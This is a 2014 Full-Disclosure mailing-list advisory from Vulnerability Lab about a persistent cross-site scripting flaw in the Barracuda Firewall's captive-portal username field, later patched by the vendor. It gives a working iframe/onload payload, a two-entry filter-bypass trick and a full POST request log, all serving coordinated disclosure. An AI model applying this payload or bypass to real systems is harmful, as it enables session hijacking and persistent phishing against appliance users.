[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Barracuda Networks Bug Bounty #31 Firewall - Persistent Access Policy Vulnerabilit
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-02-26 11:26:32
Message-ID: 530DCF68.4040900 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Barracuda Networks Bug Bounty #31 Firewall - Persistent Access Policy Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1070
Barracuda Networks Security ID (BNSEC): BNSEC-2068
Release Date:
=============
2014-02-25
Vulnerability Laboratory ID (VL-ID):
====================================
1070
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
The Barracuda Firewall goes beyond traditional network firewalls and UTMs by providing powerful \
network security, granular layer 7 application controls, user awareness and secure VPN \
connectivity combined with cloud-based malware protection, content filtering and reporting. It \
alleviates the performance bottlenecks in Unified Threat Management (UTM) appliances through \
intelligent integration of on-premise and cloud-based technologies. While the powerful \
on-premises appliance is optimized for tasks like packet forwarding and routing, Intrusion \
Prevention (IPS), DNS/DHCP services and site-to-site connectivity; CPU intensive tasks like \
virus scanning, content filtering and usage reporting benefit from the scalable performance \
and elasticity of the cloud.
(Copy of the Vendor Homepage: https://www.barracuda.com/products/firewall )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the \
official Barracuda Networks Web Firewall appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-09-04: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-09-06: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2013-10-03: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric ****** ]
2014-02-25: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: Web Firewall 6.1.0.016 - Models: X100; X200; X300; X400 & X600
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Barracuda \
Networks Web Firewall appliance web-application. The web vulnerability allows remote attackers \
or local low privileged application user accounts to inject (persistent) own malicious script \
codes on the application-side of the vulnerable online-service module.
The vulnerability is located in the `Firewall > Captive Portal > Basic Configuration` and the \
vulnerable input field is `username` under the `User Access Policy Exceptions`. Remote \
attackers are able to inject custom malicious script codes via the `Username` input field. The \
attack vector is persistent and the injection request method is POST.
To bypass the filter and to be able to save the injected payload into the application, the \
attacker needs to create 2 entries. First entry should be the attackers payload and second \
entry should be any dummy account userid. The application only performs validation on the \
active field which is freshly added and ignores the earlier entries thus allowing successful \
injection of the script code into the application interface.
The security risk of the persistent validation vulnerability is estimated as high with a cvss \
(common vulnerability scoring system) count of 3.5(+)|(-)3.6. Exploitation of the persistent \
input validation vulnerability requires a low privileged application user account and low user \
interaction. Successful exploitation results in session hijacking, persistent phishing, \
persistent external redirects & persistent manipulation of affected or connected module \
context.
Vulnerable Application(s):
[+] Firewall (WAF) Appliance Application (X300Vx v6.1.0.016)
Vulnerable Module(s):
[+] Firewall > Captive Portal > Basic Configuration > User Access Policy Exceptions
Vulnerable Parameter(s):
[+] username
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers with \
low privileged web-application user account and low user interaction. For security \
demonstration or to reproduce the remote vulnerability follow the provided information and \
steps below.
Manual steps to reproduce the vulnerability:
1. Login with the user account to the barracuda networks web firewall appliance application
2. Goto Firewall > Captive Portal > Basic Configuration > User Access Policy Exceptions
3. Inject the following Payload and click the + button to add.
ateeq%20"><iframe onload=prompt(/PoC/) src=x></iframe>
4. You should now be able to see a javascript popup proving the existence of this \
vulnerability. 5. Add another entry a dummy username. This bypass the input filter and you wont \
get a warning while trying to SAVE the modification in the application.
POC:
<td valign="top"><table class="config_module" frame="box" id="policy_exceptions" rules="none" \
style="border:none;" summary="Box" cellpadding="0" cellspacing="0"><tbody><tr><td><input \
id="username" autocomplete="off" class="authen_cp" name="username" type="text"></td> <td \
width="22"><input class="new_button authen_cp" id="+" name="+" onclick="add_exception()" \
value="+" type="button"></td></tr> <tr class="pattern"><td>"><[PERSISTENT INJECTED SCRIPT \
CODE!]></td><td><input class="new_button" value="-" name="0" type="button"> \
</td></tr></tbody></table></td>
--- PoC Session Request Logs [POST] ---
POST /cgi-mod/index.cgi HTTP/1.1
Host: firewall.ptest.localhost:7228
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://firewall.ptest.localhost:7228/cgi-mod/index.cgi?auth_type=Local&et=1378377089&l \
ocale=en_US&password=e7657221263938518ad85296817f1f3a&user=guest&primary_tab=FIREWALL&secondary_tab=authen_cp
Content-Length: 606
Cookie: ys-fw_custom_user_objects5=o%3Acolumns%3Da%253Ao%25253Aid%25253Dn%2525253A1%25255Ewidth%25253Dn%2525253A150%25255Ehidden%25
253Db%2525253A1%255Eo%25253Aid%25253Dn%2525253A2%25255Ewidth%25253Dn%2525253A150%255Eo%25253Aid%25253Dn%2525253A3%25255Ewidth%2525
3Dn%2525253A250%255Eo%25253Aid%25253Dn%2525253A4%25255Ewidth%25253Dn%2525253A200%255Eo%25253Aid%25253Dn%2525253A5%25255Ewidth%25253
Dn%2525253A50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
auth_type=Local&et=1378377108&password=33abcd72cc73fde950b3437920747e95&primary_tab=FIREWALL&realm=&secondary_tab=authen_cp&user=guest&role=
&locale=en_US&q=&UPDATE_authen_cp_usernames=ateeq%20%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe%3E&
UPDATE_authen_cp_user_auth=MSAD&UPDATE_authen_cp_user_access_policy=allow_all&username=%22%3E%3Ciframe%20onload%3Dprompt(%2FPOC%2F)%20src%3Dx%3E%3C%2Fiframe
%3E&UPDATE_authen_cp_auto_logout=30&UPDATE_authen_cp_auto_renewal=5&UPDATE_authen_cp_encryption=strong&UPDATE_authen_cp_signed_cert=
default&ajax_action=check_param_ajax_full&save=Save%20Changes
Response Headers:
HTTP/1.1 200 OK
Server: BarracudaFirewallHTTP 4.0
Date: Thu, 05 Sep 2013 10:12:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Content-Length: 2
Reference(s):
https://firewall.ptest.localhost:7228/cgi-mod/index.cgi?auth_type=Local&et=1378374620&locale=en_ \
US&password=71109464bdb6adb668cf1e8c29392af0&user=guest&primary_tab=FIREWALL&secondary_tab=authen_cp
https://firewall.ptest.localhost:7228/cgi-mod/index.cgi
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the username input field. Validate all \
entries inserted in the input field to prevent further executions of the same vulnerability.
2014-02-17: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Eric ****** ]
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities is estimated as \
medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic